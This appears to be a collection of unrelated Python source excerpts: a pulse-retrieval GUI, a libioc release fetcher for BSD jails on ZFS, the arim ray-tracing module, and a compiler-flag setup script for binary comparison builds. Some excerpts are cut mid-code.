self.settings.child('algo', 'miips_parameter', 'max').value(),
self.settings.child('algo', 'miips_parameter', 'step').value())
else:
self.pnps = PNPS(self.data_in['pulse_in'], method, nlprocess)
self.state.append("spectrum_processed")
self.pulse_canvas.figure.clf()
PulsePlot(self.data_in['pulse_in'], self.pulse_canvas.figure)
self.pulse_canvas.draw()
def start_retriever(self):
if "trace_processed" not in self.state:
popup_message("Error", "Please process the trace first!")
return
self.ui.dock_retriever.raiseDock()
self.info_widget.clear()
# mandatory to deal with multithreads
if self.retriever_thread is not None:
if self.retriever_thread.isRunning():
self.retriever_thread.terminate()
while not self.retriever_thread.isFinished():
QThread.msleep(100)
self.retriever_thread = None
self.retriever_thread = QThread()
retriever = RetrieverWorker(self.data_in, self.pnps, self.settings)
retriever.moveToThread(self.retriever_thread)
retriever.status_sig[str].connect(self.update_retriever_info)
retriever.result_signal[SimpleNamespace].connect(self.display_results)
retriever.callback_sig[list].connect(self.update_retriever)
self.retriever_signal[str].connect(retriever.command_retriever)
self.retriever_thread.retriever = retriever
self.retriever_thread.start()
self.retriever_signal.emit('start')
self.state.append("retrieving")
def stop_retriever(self):
if "retrieving" not in self.state:
popup_message("Error", "No retrieval running")
return
self.retriever_signal.emit('stop')
def update_retriever_info(self, info):
self.info_widget.moveCursor(QTextCursor.End)
self.info_widget.insertPlainText(info+'\n')
self.info_widget.moveCursor(QTextCursor.End)
@pyqtSlot(list)
def update_retriever(self, args):
max = 0.8*np.max([np.abs(np.max(args[0])), np.abs(np.min(args[0]))])
self.viewer_live_trace.ui.histogram_red.setHistogramRange(-max, max)
self.viewer_live_trace.ui.histogram_red.setLevels(-max, max)
self.viewer_live_trace.setImage(args[0])
self.viewer_live_trace.x_axis = utils.Axis(data=args[2], label='Time', units='s')
self.viewer_live_trace.y_axis = utils.Axis(data=args[1], label='Frequency', units='m')
self.data_in['pulse_in'].spectrum = args[3]
#self.data_in['pulse_in'] = substract_linear_phase(self.data_in['pulse_in'])
self.viewer_live_time.show_data([np.abs(self.data_in['pulse_in'].field)**2],
x_axis=utils.Axis(data=self.data_in['pulse_in'].t, label='Time', units='s'),
labels=['Temporal Intensity'])
self.viewer_live_lambda.show_data([np.abs(self.data_in['pulse_in'].spectrum)**2],
x_axis=utils.Axis(data=self.data_in['pulse_in'].wl, label='Wavelength',
units='m'),
labels=['Spectral Intensity'])
@pyqtSlot(SimpleNamespace)
def display_results(self, result):
self.result = result
self.state.append("result_ok")
self.ui.dock_retrieved_data.raiseDock()
self.data_in['pulse_in'].spectrum = result.pulse_retrieved
fundamental = self.data_in['raw_spectrum']['data']
wavelength = self.data_in['raw_spectrum']['x_axis']['data']
#fundamental *= (wavelength * wavelength)
spec = self.data_in['pulse_in'].spectral_intensity
spec = scipy.interpolate.interp1d(self.data_in['pulse_in'].wl, spec,
bounds_error=False,
fill_value=0.0)(wavelength)
fundamental *= lib.best_scale(fundamental, spec)
print("spectrum error", "%e" % lib.nrms(fundamental, spec))
# do the retrieval plot
self.data_canvas.figure.clf()
RetrievalResultPlot(result, fig=self.data_canvas.figure, fundamental=fundamental,
fundamental_wavelength=wavelength,
oversampling=8, phase_blanking=True,
phase_blanking_threshold=0.01, limit=True)
self.data_canvas.draw()
@pyqtSlot(QtCore.QRectF)
def update_ROI(self, rect=QtCore.QRectF(0, 0, 1, 1)):
self.settings.child('processing', 'ROIselect', 'x0').setValue(int(rect.x()))
self.settings.child('processing', 'ROIselect', 'y0').setValue(int(rect.y()))
self.settings.child('processing', 'ROIselect', 'width').setValue(max([1, int(rect.width())]))
self.settings.child('processing', 'ROIselect', 'height').setValue(max([1, int(rect.height())]))
def update_linear(self, linear_roi):
pos = linear_roi.pos()
pos_real, y = self.viewer_trace_in.scale_axis(np.array(pos), np.array([0, 1]))
pos_real *= 1e9
self.settings.child('processing', 'linearselect', 'wl0').setValue(pos_real[0])
self.settings.child('processing', 'linearselect', 'wl1').setValue(pos_real[1])
def show_ROI(self):
# self.settings.child('processing', 'ROIselect').setOpts(
# visible=self.viewer_trace_in.ROIselect_action.isChecked())
data = self.data_in['raw_trace']['data']
axes = [np.arange(0, data.shape[0]), np.arange(0, data.shape[1])]
axes_index = list(range(data.ndim))
marginals = lib.marginals(data)
limits = []
for index in axes_index:
limit = lib.limit(axes[index], marginals[index],
threshold=1e-2, padding=0.25)
limits.append(limit)
self.viewer_trace_in.ui.ROIselect.setPos((limits[1][0], limits[0][0]))
self.viewer_trace_in.ui.ROIselect.setSize((limits[1][1]-limits[1][0], limits[0][1] - limits[0][0]))
self.linear_region.setPos(limits[1])
pos = self.viewer_trace_in.ui.ROIselect.pos()
size = self.viewer_trace_in.ui.ROIselect.size()
self.update_ROI(QtCore.QRectF(pos[0], pos[1], size[0], size[1]))
def get_trace_in(self):
method = self.settings.child('algo', 'method').value()
if method == 'dscan':
label = 'Insertion'
unit = 'm'
elif method == 'miips':
label = 'Phase'
unit = 'rad'
else:
label = 'Delay'
unit = 's'
self.data_in['trace_in'] = MeshData(self.data_in['raw_trace']['data'],
self.data_in['raw_trace']['y_axis']['data'],
self.data_in['raw_trace']['x_axis']['data'],
labels=[label, "wavelength"], units=[unit, "m"])
return self.data_in['trace_in']
def get_pulse_in(self):
self.data_in['pulse_in'] = pulse_from_spectrum(self.data_in['raw_spectrum']['x_axis']['data'],
self.data_in['raw_spectrum']['data'])
def get_axes_from_trace_node(self, fname, node_path):
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
return axes['x_axis'], axes['nav_00']
def load_last_scan(self):
try:
viewer = self.dashboard.scan_module.ui.scan2D_graph
parameter_axis = utils.Axis(data=viewer.x_axis_scaled.copy(),
label=viewer.scaling_options['scaled_xaxis']['label'],
units=viewer.scaling_options['scaled_xaxis']['units'])
wl = utils.Axis(data=viewer.y_axis_scaled.copy(),
label=viewer.scaling_options['scaled_yaxis']['label'],
units=viewer.scaling_options['scaled_yaxis']['units'])
data = self.dashboard.scan_module.scan_data_2D[0].T.copy()
self.set_data_in_exp(data, wl, parameter_axis)
except Exception as e:
pass
def load_trace_in(self, fname=None, node_path=None):
try:
if fname is not None and node_path is not None:
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
else:
data, fname, node_path = browse_data(ret_all=True, message='Select the node corresponding to the'
'Characterization Trace')
if fname != '':
self.save_file_pathname = fname
self.settings.child('data_in_info', 'loaded_file').setValue(fname)
self.settings.child('data_in_info', 'loaded_node').setValue(node_path)
wl, parameter_axis = self.get_axes_from_trace_node(fname, node_path)
self.set_data_in_exp(data, wl, parameter_axis, fname, node_path)
except Exception as e:
logger.exception(str(e))
def set_data_in_exp(self, data, wl, parameter_axis, fname='', node_path=''):
if self.data_in is None:
self.data_in = DataIn(source='experimental')
scaling_parameter = self.settings.child('data_in_info',
'trace_in_info', 'param_scaling').value()
scaling_wl = self.settings.child('data_in_info', 'trace_in_info', 'wl_scaling').value()
wl['units'] = 'm'
wl['data'] *= scaling_wl
parameter_axis['data'] *= scaling_parameter
parameter_axis['units'] = 'p.u.'
self.data_in.update(dict(raw_trace={'data': data, 'x_axis': wl, 'y_axis': parameter_axis},
file_path=fname,
node_path=node_path))
self.update_trace_info(self.data_in['raw_trace'])
self.display_trace_in()
self.viewer_trace_in.ROIselect_action.trigger()
def load_spectrum_in(self, fname=None, node_path=None):
if fname is not None and node_path is not None:
h5file = self.h5browse.open_file(fname)
data, axes, nav_axes, is_spread = self.h5browse.get_h5_data(node_path)
self.h5browse.close_file()
else:
data, fname, node_path = browse_data(ret_all=True, message='Select the node corresponding to the'
'Fundamental Spectrum')
if fname != '':
| |
def version_snapshots(self) -> typing.List['libzfs.ZFSSnapshot']:
"""Return the sorted list of taken version snapshots (e.g. p3)."""
versions: typing.List[int] = []
snapshots: typing.Dict[int, 'libzfs.ZFSSnapshot'] = {}
pattern = re.compile(r"^p(\d+)$")
for snapshot in self.root_dataset.snapshots:
match = pattern.match(snapshot.snapshot_name)
if match is None:
continue
patch_level = int(match[1])
versions.append(patch_level)
snapshots[patch_level] = snapshot
return [snapshots[i] for i in reversed(sorted(versions))]
def _require_release_supported(self) -> None:
if self.host.distribution.name == "HardenedBSD":
version = self.release.version_number
if (version == 0) or (version >= 10.4):
return
raise libioc.errors.UnsupportedRelease(
version=version,
logger=self.logger
)
@property
def version_number(self) -> float:
"""Return the numeric release version number or 0 for CURRENT."""
return self._parse_release_version(self.name)
def _parse_release_version(self, release_version_string: str) -> float:
_parts = release_version_string.split("-", maxsplit=1)
parsed_version = _parts[0]
try:
version = float(parsed_version)
if self.host.distribution.name == "HardenedBSD":
if (len(_parts) == 2) and (_parts[1].upper() == "STABLE"):
if (version == 10.0):
return 10.4
elif (version == 11.0):
return 11.1
return version
except ValueError:
return float(0)
@property
def mirror_url(self) -> str:
"""Return the distributions release mirror URL."""
if self._mirror_url is None:
return str(self.host.distribution.mirror_url)
else:
return self._mirror_url
@mirror_url.setter
def mirror_url(self, value: str) -> None:
"""Override the default release mirror URL."""
url = urllib.parse.urlparse(value)
if url.scheme not in self._supported_url_schemes:
raise ValueError(f"Invalid URL scheme '{url.scheme}'")
self._mirror_url = url.geturl()
@property
def remote_url(self) -> str:
"""Return the releases full mirror URL."""
return f"{self.mirror_url}/{self.real_name}"
@property
def available(self) -> bool:
"""Return True if the release is available on the remote mirror."""
try:
request = urllib.request.Request(self.remote_url, method="HEAD")
resource = urllib.request.urlopen(request) # nosec: trusted URL
return (resource.getcode() == 200) is True # noqa: T484
except urllib.error.URLError:
pass
return False
@property
def fetched(self) -> bool:
"""Return True if the release is fetched locally."""
if self.exists is False:
return False
try:
root_dir_index = os.listdir(self.root_dataset.mountpoint)
except libzfs.ZFSException:
return False
for expected_directory in ["dev", "var", "etc"]:
if expected_directory not in root_dir_index:
return False
return True
@property
def newer_than_host(self) -> bool:
"""Return True if the release is newer than the host."""
host_release_name = self._pad_release_name(self.host.release_version)
release_name = self._pad_release_name(self.name)
host_is_current = host_release_name.startswith("CURRENT")
release_is_current = release_name.startswith("CURRENT")
if release_is_current is True:
if host_is_current is False:
return True
else:
return False
cropped_release_name = release_name[:len(host_release_name)]
return (host_release_name < cropped_release_name)
def _pad_release_name(self, release_name: str, digits: int=4) -> str:
"""Pad releases with 0 until it has 4 characters before the first."""
try:
major_version = int(release_name.split("-")[0].split(".")[0])
padding = str("0" * (digits - len(str(major_version))))
return padding + release_name
except (KeyError, AttributeError, ValueError):
return release_name
@property
def zfs_pool(self) -> libzfs.ZFSPool:
"""Return the releases ZFS pool."""
try:
root_pool = self.root_dataset.pool # type: libzfs.ZFSPool
return root_pool
except AttributeError:
pool = self.host.datasets.releases.pool # type: libzfs.ZFSPool
return pool
@property
def hashes(self) -> typing.Dict[str, str]:
"""Return the releases asset hashes."""
if self._hashes is None:
if not os.path.isfile(self.__get_hashfile_location()):
self.logger.spam("hashes have not yet been downloaded")
self._fetch_hashes()
self._hashes = self.read_hashes()
if isinstance(self._hashes, dict):
return self._hashes
raise libioc.errors.ReleaseAssetHashesUnavailable(
logger=self.logger
)
@property
def _supported_url_schemes(self) -> typing.List[str]:
return ["https", "http", "ftp"]
@property
def hbds_release_branch(self) -> str:
"""Translate the release into a HardenedBSD release git branch name."""
if self._hbsd_release_branch is not None:
return self._hbsd_release_branch
if self.fetched is False:
raise libioc.errors.ReleaseNotFetched(
name=self.name,
logger=self.logger
)
root_dataset_mountpoint = self.root_dataset.mountpoint
source_file = f"{root_dataset_mountpoint}/etc/hbsd-update.conf"
if not os.path.isfile(source_file):
raise libioc.errors.ReleaseUpdateBranchLookup(
release_name=self.name,
reason=f"{source_file} not found",
logger=self.logger
)
libioc.helpers.require_no_symlink(source_file, logger=self.logger)
with open(source_file, "r", encoding="utf-8") as f:
import ucl
hbsd_update_conf = ucl.load(f.read())
self._hbsd_release_branch = hbsd_update_conf["branch"]
return str(self._hbsd_release_branch)
def fetch(
self,
update: bool=False,
fetch_updates: bool=False,
event_scope: typing.Optional['libioc.events.Scope']=None,
update_base: typing.Optional[bool]=None
) -> typing.Generator['libioc.events.IocEvent', None, None]:
"""
Fetch the release from the remote.
Args:
update (bool): (default=False)
When enabled, updates are applied to the release,
unless fetching updates was without success.
fetch_updates (bool): (default=False)
When enabled, updates are fetched.
Disabling this option has no impact on applying updates.
event_scope (libioc.events.Scope): (optional)
Pass on the IocEvent stack for use in higher order functions.
update_base (bool): (optional)
When unset, the sysrc config `ioc_legacy_support` is taken
into account to determine whether ZFS basejail datasets should
be updated in case the release was created or modified.
Those ZFS basejail datasets are required to start basejails
created with iocage_legacy.
A boolean value overrides the configuration from /etc/rc.conf.
"""
release_changed: typing.Optional[bool] = None
self._require_release_supported()
events = libioc.events
fetchReleaseEvent = events.FetchRelease(
self,
scope=event_scope
)
_scope = fetchReleaseEvent.scope
releasePrepareStorageEvent = events.ReleasePrepareStorage(
self,
scope=_scope
)
releaseDownloadEvent = events.ReleaseDownload(
self,
scope=_scope
)
releaseExtractionEvent = events.ReleaseExtraction(
self,
scope=_scope
)
releaseConfigurationEvent = events.ReleaseConfiguration(
self,
scope=_scope
)
releaseCopyBaseEvent = events.ReleaseCopyBase(
self,
scope=_scope
)
if self.fetched is False:
release_changed = False
yield fetchReleaseEvent.begin()
yield releasePrepareStorageEvent.begin()
# ToDo: allow to reach this for forced re-fetch
self.create_resource()
self.get_or_create_dataset("root")
self._ensure_dataset_mounted()
yield releasePrepareStorageEvent.end()
yield releaseDownloadEvent.begin()
try:
yield from self._fetch_assets(releaseDownloadEvent.scope)
except Exception:
yield releaseDownloadEvent.fail()
raise
yield releaseDownloadEvent.end()
yield releaseExtractionEvent.begin()
try:
self._extract_assets()
except Exception as e:
yield releaseExtractionEvent.fail(e)
raise
yield releaseExtractionEvent.end()
release_changed = True
yield fetchReleaseEvent.end()
else:
yield fetchReleaseEvent.skip(
message="already downloaded"
)
self.logger.verbose(
"Release was already downloaded. Skipping download."
)
yield releaseConfigurationEvent.begin()
rc_conf_changed = False
if self._set_default_rc_conf() is True:
rc_conf_changed = True
release_changed = True
if (self._set_default_sysctl_conf() or rc_conf_changed) is True:
release_changed = True
yield releaseConfigurationEvent.end()
else:
yield releaseConfigurationEvent.skip()
self.snapshot("p0")
if fetch_updates is True:
try:
for event in self.updater.fetch(event_scope=_scope):
if isinstance(event, libioc.events.ReleaseUpdateDownload):
if (event.done and event.skipped) is True:
update = False
yield event
except libioc.errors.IocException:
update = False
if update is True:
for event in self.updater.apply():
if isinstance(event, libioc.events.IocEvent):
yield event
else:
# the only non-IocEvent is our return value
release_changed = event
yield releaseCopyBaseEvent.begin()
if update_base is True:
_update_base = True
elif update_base is None:
# if not specified, lookup global host configuration
legacy_support_key = "ioc_legacy_support"
rc_conf = libioc.Config.Host.rc_conf
if legacy_support_key in rc_conf:
_update_base = (rc_conf[legacy_support_key] is True)
else:
_update_base = False
else:
_update_base = False
if _update_base is True:
if release_changed is False:
yield releaseCopyBaseEvent.skip(message="release unchanged")
self.update_base_release()
yield releaseCopyBaseEvent.end()
else:
yield releaseCopyBaseEvent.skip(
message="legacy basejal support disabled"
)
self._cleanup()
def _copy_to_base_release(self) -> None:
libioc.helpers.exec(
[
"rsync",
"-a",
"--delete",
f"{self.root_dataset.mountpoint}/",
f"{self.base_dataset.mountpoint}"
],
logger=self.logger
)
@property
def _base_resource(self) -> ReleaseResource:
return ReleaseResource(
release=self.release,
logger=self.logger,
host=self.host,
zfs=self.zfs
)
# ToDo: Memoize ReleaseResource
def snapshot(
self,
identifier: str,
force: bool=False
) -> libzfs.ZFSSnapshot:
"""
Create a ZFS snapshot of the release.
Args:
identifier:
This string specifies the snapshots name
force: (default=False)
Enabling this option forces re-creation of a snapshot in case
it already exists for the given identifier
Returns:
libzfs.ZFSSnapshot: The ZFS snapshot object found or created
"""
snapshot_name = f"{self.root_dataset.name}@{identifier}"
existing_snapshot: typing.Optional[libzfs.ZFSSnapshot] = None
try:
existing_snapshot = self.zfs.get_snapshot(snapshot_name)
if (force is False) and (existing_snapshot is not None):
self.logger.verbose(
f"Re-using release snapshot {self.name}@{identifier}"
)
return existing_snapshot
except libzfs.ZFSException:
existing_snapshot = None
pass
if existing_snapshot is not None:
self.logger.verbose(
f"Deleting release snapshot {self.name}@{identifier}"
)
existing_snapshot.delete()
existing_snapshot = None
self.root_dataset.snapshot(snapshot_name)
snapshot: libzfs.ZFSSnapshot = self.zfs.get_snapshot(snapshot_name)
return snapshot
def _ensure_dataset_mounted(self) -> None:
if not self.dataset.mountpoint:
self.dataset.mount()
def _fetch_hashes(self) -> None:
url = f"{self.remote_url}/{self.host.distribution.hash_file}"
path = self.__get_hashfile_location()
self.logger.verbose(f"Downloading hashes from {url}")
urllib.request.urlretrieve(url, path) # nosec: validated in @setter
self.logger.debug(f"Hashes downloaded to {path}")
def _fetch_assets(
self,
event_scope: typing.Optional['libioc.events.Scope']=None,
) -> typing.Generator['libioc.events.IocEvent', None, None]:
for asset in self.assets:
releaseAssetDownloadEvent = libioc.events.ReleaseAssetDownload(
release=self,
scope=event_scope
)
yield releaseAssetDownloadEvent.begin()
url = f"{self.remote_url}/{asset}.txz"
path = self._get_asset_location(asset)
if os.path.isfile(path):
yield releaseAssetDownloadEvent.skip("{path} already exists")
else:
try:
self.logger.debug(f"Starting download of {url}")
urllib.request.urlretrieve(url, path) # nosec: validated
self.logger.verbose(f"{url} was saved to {path}")
yield releaseAssetDownloadEvent.end()
except urllib.error.HTTPError as http_error:
yield releaseAssetDownloadEvent.fail()
raise libioc.errors.DownloadFailed(
url=url,
code=http_error.code,
logger=self.logger
)
def read_hashes(self) -> typing.Dict[str, str]:
"""Read the release asset hashes."""
# yes, this can read HardenedBSD and FreeBSD hash files
path = self.__get_hashfile_location()
hashes = {}
with open(path, "r", encoding="utf-8") as f:
for line in f.read().splitlines():
s = set(line.replace("\t", " ").split(" "))
fingerprint = None
asset = None
for x in s:
x = x.strip("()")
if len(x) == 64:
fingerprint = x
elif x.endswith(".txz"):
asset = x[:-4]
if asset and fingerprint:
hashes[asset] = fingerprint
count = len(hashes)
self.logger.spam(f"{count} hashes read from {path}")
return hashes
def __get_hashfile_location(self) -> str:
hash_file = self.host.distribution.hash_file
return f"{self.download_directory}/{hash_file}"
def _get_asset_location(self, asset_name: str) -> str:
return f"{self.download_directory}/{asset_name}.txz"
def _extract_assets(self) -> None:
for asset in self.assets:
if self.check_hashes:
self._check_asset_hash(asset)
libioc.SecureTarfile.extract(
file=self._get_asset_location(asset),
compression_format="xz",
destination=self.root_dir,
logger=self.logger
)
def _set_default_rc_conf(self) -> bool:
for key, value in self.DEFAULT_RC_CONF.items():
self.rc_conf[key] = value
return self.rc_conf.save() is True
def _set_default_sysctl_conf(self) -> | |
<filename>arim/ray.py
"""
Ray tracing module
"""
import contextlib
import gc
import logging
import math
import time
import warnings
from concurrent.futures import ThreadPoolExecutor
import numba
import numpy as np
from . import settings as s
from . import geometry as g
from .helpers import Cache, NoCache
from .exceptions import InvalidDimension, ArimWarning
from .helpers import chunk_array
def find_minimum_times(
time_1, time_2, dtype=None, dtype_indices=None, block_size=None, numthreads=None
):
"""
For i=1:n and j=1:p,
out_min_times(i, j) := min_{k=1:m} time_1[i, k] + time_2[k, j]
out_min_indices(i, j) := argmin_{k=1:m} time_1[i, k] + time_2[k, j]
Parameters
----------
time_1
Shape: (n, m)
time_2
Shape: (m, p)
dtype
dtype_indices
Returns
-------
out_min_times
Shape: (n, p)
out_min_indices
Shape: (n, p)
Notes
-----
Memory usage:
- duplicate 'time_1' if it not in C-order.
- duplicate 'time_2' if it not in Fortran-order.
"""
assert time_1.ndim == 2
assert time_2.ndim == 2
try:
n, m = time_1.shape
m_, p = time_2.shape
except ValueError:
raise InvalidDimension("time_1 and time_2 must be 2d.")
if m != m_:
raise ValueError("Array shapes must be (n, m) and (m, p).")
if dtype is None:
dtype = np.result_type(time_1, time_2)
if dtype_indices is None:
dtype_indices = s.INT
if block_size is None:
block_size = s.BLOCK_SIZE_FIND_MIN_TIMES
if numthreads is None:
numthreads = s.NUMTHREADS
out_min_times = np.full((n, p), np.inf, dtype=dtype)
out_best_indices = np.full((n, p), np.inf, dtype=dtype_indices)
# time_1 will be scanned row per row, time_2 column per column.
# Force to use the most efficient order (~20 times speed-up between the best and worst case).
time_1 = np.ascontiguousarray(time_1)
time_2 = np.asfortranarray(time_2)
# Chunk time_1 and time_2 such as each chunk contains roughly 'block_size'
# floats. Chunks for 'time_1' are lines (only complete lines), chunks
# for 'time_2' are columns (only complete columns).
block_size_adj = math.ceil(block_size / m)
futures = []
with ThreadPoolExecutor(max_workers=numthreads) as executor:
for chunk1 in chunk_array((n, m), block_size_adj, axis=0):
for chunk2 in chunk_array((m, p), block_size_adj, axis=1):
chunk_res = (chunk1[0], chunk2[1])
futures.append(
executor.submit(
_find_minimum_times,
time_1[chunk1],
time_2[chunk2],
out_min_times[chunk_res],
out_best_indices[chunk_res],
)
)
# Raise exceptions that happened, if any:
for future in futures:
future.result()
return out_min_times, out_best_indices
@numba.jit(nopython=True, nogil=True, cache=True)
def _find_minimum_times(time_1, time_2, out_min_times, out_best_indices):
"""
Parameters
----------
time_1
time_2
out_min_time
out_best_indices
Returns
-------
"""
n, m = time_1.shape
m, p = time_2.shape
for i in range(n):
for j in range(p):
for k in range(m):
new_time = time_1[i, k] + time_2[k, j]
if new_time < out_min_times[i, j]:
out_min_times[i, j] = new_time
out_best_indices[i, j] = k
logger = logging.getLogger(__name__)
def ray_tracing_for_paths(paths_list, convert_to_fortran_order=False):
"""
Perform the ray tracing for different paths. Save the result in ``Path.rays``.
Parameters
----------
paths_list : List[Path]
convert_to_fortran_order
Returns
-------
None
"""
paths_list = tuple(paths_list)
fermat_paths_tuple = tuple(FermatPath.from_path(path) for path in paths_list)
fermat_solver = FermatSolver(fermat_paths_tuple)
rays_dict = fermat_solver.solve()
for path, fermat_path in zip(paths_list, fermat_paths_tuple):
rays = rays_dict[fermat_path]
suspicious_rays = rays.gone_through_extreme_points()
num_suspicious_rays = suspicious_rays.sum()
if num_suspicious_rays > 0:
logger.warning(
f"{num_suspicious_rays} rays of path {path.name} go through "
"the interface limits. Extend limits."
)
if convert_to_fortran_order:
old_rays_dict = rays_dict
rays_dict = {k: v.to_fortran_order() for k, v in old_rays_dict.items()}
# Save results in attribute path.rays:
for path, fermat_path in zip(paths_list, fermat_paths_tuple):
path.rays = rays_dict[fermat_path]
def ray_tracing(views_list, convert_to_fortran_order=False):
"""
Perform the ray tracing for different views. Save the result in ``Path.rays``.
Parameters
----------
views : List[View]
Returns
-------
None
"""
# Ray tracing:
paths_set = set(v.tx_path for v in views_list) | set(v.rx_path for v in views_list)
return ray_tracing_for_paths(
list(paths_set), convert_to_fortran_order=convert_to_fortran_order
)
@numba.jit(nopython=True, nogil=True, parallel=True)
def _expand_rays(interior_indices, indices_new_interface, expanded_indices):
"""
Expand the rays by one interface knowing the beginning of the rays and the
points the rays must go through at the last interface.
A0, A1, ..., A(d+1) are (d+2) interfaces.
n: number of points of interface A0
m: number of points of interface Ad
p: number of points of interface A(d+1)
Arrays layout must be contiguous.
Output: out_ray
Parameters
----------
interior_indices: *interior* indices of rays going from A(0) to A(d).
Shape: (d, n, m)
indices_new_interface: indices of the points of interface A(d) that the rays
starting from A(0) cross to go to A(d+1).
Shape: (n, p)
expanded_indices: OUTPUT
Shape (d+1, n, p)
"""
d, n, m = interior_indices.shape
_, p = indices_new_interface.shape
for i in numba.prange(n):
for j in range(p):
# get the point on interface A(d) to which the ray goes
idx = indices_new_interface[i, j]
# copy the head of ray
for k in range(d):
expanded_indices[k, i, j] = interior_indices[k, i, idx]
# add the last point
expanded_indices[d, i, j] = idx
class Rays:
"""
Rays(times, interior_indices, path)
Store the rays between the first and last sets of points along
a specific path.
- n: number of points of the first set of points.
- m: number of points of the last set of points.
- d: number of interfaces along the path.
We name A(1), A(2), ..., A(d) the d interfaces along the path.
A ray passes A(1), A(2), ..., A(d) in this order.
The ray (i, j) is defined as the ray starting in `A(1)[i]`` and
arriving in ``A(d)[j]``.
Parameters
----------
times : ndarray of floats [n x m]
Shortest time between first and last set of points.
``times[i, j]`` is the total travel time for the ray (i, j).
indices_interior : ndarray of floats [(d-2) x n x m]
Indices of points through which each ray goes, excluding the first and last interfaces.
``indices[k-1, i, j]`` is the indice point of the ``k`` *interior* interface through which
the ray (i,j) goes.
fermat_path : FermatPath
Sets of points crossed by the rays.
order : None, 'C' or 'F'
Force the order if the indices
Attributes
----------
times
indices_interior
fermat_path
indices : ndarray of floats [d x n x m]
Indices of points through which each ray goes.
For k=0:p, a ray starting from ``A(1)[i]`` and ending in ``A(d)[i]``
goes through the k-th interface at the point indexed by ``indices[k, i, j]``.
By definition, ``indices[0, i, j] := i`` and ``indices[d-1, i, j] := j``
for all i and j.
"""
# __slots__ = []
def __init__(self, times, interior_indices, fermat_path, order=None):
assert times.ndim == 2
assert interior_indices.ndim == 3
assert (
times.shape
== interior_indices.shape[1:]
== (len(fermat_path.points[0]), len(fermat_path.points[-1]))
)
assert fermat_path.num_points_sets == interior_indices.shape[0] + 2
assert interior_indices.dtype.kind == "i"
assert times.dtype.kind == "f"
indices = self.make_indices(interior_indices, order=order)
self._times = times
self._indices = indices
self._fermat_path = fermat_path
@classmethod
def make_rays_two_interfaces(cls, times, path, dtype_indices):
"""
Alternative constructor for Rays objects when there is only two interfaces,
i.e. no interior interface.
"""
if path.num_points_sets != 2:
raise ValueError(
"This constructor works only for path with two interfaces. Use __init__ instead."
)
n = len(path.points[0])
m = len(path.points[1])
interior_indices = np.zeros((0, n, m), dtype=dtype_indices)
return cls(times, interior_indices, path)
@property
def fermat_path(self):
return self._fermat_path
@property
def times(self):
return self._times
@property
def indices(self):
return self._indices
@property
def interior_indices(self):
return self.indices[1:-1, ...]
@staticmethod
def make_indices(interior_indices, order=None):
"""
Parameters
----------
interior_indices : ndarray
Shape (d, n, m)
Returns
-------
indices : ndarray
Shape (n, m, d+2) such as:
- indices[0, i, j] := i for all i, j
- indices[-1, i, j] := j for all i, j
- indices[k, i, j] := interior_indices[i, j, k+1] for all i, j and for k=1:(d-1)
"""
dm2, n, m = interior_indices.shape
if order is None:
if interior_indices.flags.c_contiguous:
order = "C"
elif interior_indices.flags.fortran:
order = "F"
else:
order = "C"
indices = np.zeros((dm2 + 2, n, m), dtype=interior_indices.dtype, order=order)
indices[0, ...] = np.repeat(np.arange(n), m).reshape((n, m))
indices[-1, ...] = np.tile(np.arange(m), n).reshape((n, m))
indices[1:-1, ...] = interior_indices
return indices
def get_coordinates(self, n_interface):
"""
Yields the coordinates of the rays of the n-th interface, as a tuple
of three 2d ndarrays.
Use numpy fancy indexing.
Example
-------
::
for (d, (x, y, z)) in enumerate(rays.get_coordinates()):
# Coordinates at the d-th interface of the ray between ray A(1)[i] and
# ray_A(d)[j].
x[i, j]
y[i, j]
z[i, j]
"""
points = self.fermat_path.points[n_interface]
indices = self.indices[n_interface, ...]
x = points.x[indices]
y = points.y[indices]
z = points.z[indices]
yield (x, y, z)
def get_coordinates_one(self, start_index, end_index):
"""
Return the coordinates of one ray as ``Point``.
This function is slow: use ``get_coordinates`` or a variant | |
<filename>build-for-compare.py
#!/usr/bin/env python3
# Written by <NAME>, provided under MIT license.
#
# Usage: ../do_build.py <hash> [<hash> ...]
# Will produce a ../groestlcoind.$1.stripped for binary comparison
import os,subprocess,sys,argparse,logging,shutil,re,hashlib,shlex,tempfile
from collections import defaultdict
from typing import List
logger = logging.getLogger('do_build')
# Use this command to compare resulting directories
# git diff -W --word-diff /tmp/compare/4b5b263 /tmp/compare/d1bc5bf
# WARNING WARNING WARNING
# DO NOT RUN this with --nocopy=1 on working tree if you have any local additions.
# It will nuke all non-repository files, multiple times over.
# WARNING WARNING WARNING
CONFIGURE_EXTRA=[
'EVENT_CFLAGS=-I/opt/libevent/include',
'EVENT_LIBS=-L/opt/libevent/lib -levent',
'EVENT_PTHREADS_CFLAGS=-I/opt/libevent/include',
'EVENT_PTHREADS_LIBS=-L/opt/libevent/lib -levent_pthreads'
]
DEFAULT_PARALLELISM=4
DEFAULT_ASSERTIONS=0
DEFAULT_NOCOPY=0
DEFAULT_PATCH='stripbuildinfo.patch'
TMPDIR=tempfile.gettempdir()
DEFAULT_TGTDIR=os.path.join(TMPDIR, 'compare')
DEFAULT_REPODIR=os.path.join(TMPDIR, 'repo')
# No debugging information (not used by analysis at the moment, saves on I/O)
OPTFLAGS=["-O0","-g0"]
# Some options from -O to reduce code size
# can't use -O or -Os as it does some weird cross-contamination between unchanged functions in compilation unit
# Selectively enable opts that don't interfere or cause excessive sensitivity to changes
#
OPTFLAGS+=["-fcombine-stack-adjustments","-fcompare-elim","-fcprop-registers","-fdefer-pop","-fforward-propagate","-fif-conversion","-fif-conversion2",
"-finline-functions-called-once","-fshrink-wrap","-fsplit-wide-types","-ftree-bit-ccp","-ftree-ccp","-ftree-ch","-ftree-copy-prop","-ftree-copyrename",
"-ftree-dce","-ftree-dominator-opts","-ftree-dse","-ftree-fre","-ftree-sink","-ftree-slsr","-ftree-sra","-ftree-ter"
]
#
# -ffunctions-sections/-fdata-sections put every element in its own section. This is essential.
OPTFLAGS+=['-ffunction-sections', '-fdata-sections']
# Fix the random seed
OPTFLAGS+=['-frandom-seed=notsorandom']
# OFF: -fmerge-constants don't attempt to merge constants: this causes global interaction between sections/functions
# this was reenabled because it doesn't matter, the numbered section names are annoying merged or unmerged
OPTFLAGS+=['-fmerge-all-constants']
# -fipa-sra semi-randomly renames functions (or creates variants of functions with different names(
OPTFLAGS+=['-fno-ipa-sra']
